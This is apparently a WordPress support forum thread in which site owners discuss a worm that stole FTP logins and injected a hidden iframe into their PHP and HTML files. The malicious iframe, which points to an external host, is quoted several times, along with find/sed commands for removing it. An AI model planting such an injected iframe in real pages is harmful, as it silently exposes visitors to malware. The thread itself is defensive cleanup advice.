Help Please! Warning: Unexpected character in input

<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe>

this line tells me you have been hacked
you need to report this to your host immediately
look through all index files on your site for this sort of injection
search these forums for hacked blogs and you can see some good advice

This is a virus / worm that steals your ftp login information from your ftp programs and modifies lots of php / html / htm pages on all of the sites it can access.

We got hit yesterday and it modified hundreds different websites from small blogs upto large commercial websites.

You will find lots of entries in your ftp logfile showing someone downloading the file and then re uploading it again.

It appears to destructively modify the files overwriting whatever text was there – the file size will be the same after it’s been modified.

These commands will remove the code and replace it with a space character :

find . -name ‘*.php’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;
find . -name ‘*.html’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;
find . -name ‘*.htm’ -exec sed -i ‘s#<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe># #’ {} \;

Thanks neilmc — that’s exactly what happened. How did you remedy the virus? Whatever it was hacked into all my FTP sites (WordPress & others). I want to make sure it doesn’t happen again, and that the worm is completely removed.

I ran Spy Sweeper and it found Trojan-pushu and Trojan-backdoor-stinkbreath. I’m guessing this was the cause. Quarantined & deleted, only to discover the Trojans had returned when I ran another sweep later in the day.

Any advice?

im having the same problem with this issue. Do I need to just cut the:

<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe>

out of the PHP Index file?

Thanks in advance!

Do I need to just cut the:

<iframe src=”https://technologybigtop.cn:8080/ts/in.cgi?pepsi14&#8243; width=12 height=12 style=”visibility: hidden”></iframe>

out of the PHP Index file?

no that alone won’t do it
all of your index files will be affected and likely it will be in your database
you need to contact your host and inform them
you need to replace all of your index files and do a grep or search on the other files at your site
you need to upload a database back up of before this happened.
you need to search these forums for more solutions

I have a similar issue, but I cannot even log-in. What do I do?

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/content/b/e/o/beoleary/html/profilingguru/index.php on line 17

Parse error: syntax error, unexpected ‘.’ in /home/content/b/e/o/beoleary/html/profilingguru/index.php on line 17

`I replaced my index.php from a backup and that worked. I suppose this is the only text that has to be present.

<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>

I tried the above, now I get:

Parse error: syntax error, unexpected T_STRING in /home/content/b/e/o/beoleary/html/profilingguru/wp-includes/default-filters.php on line 207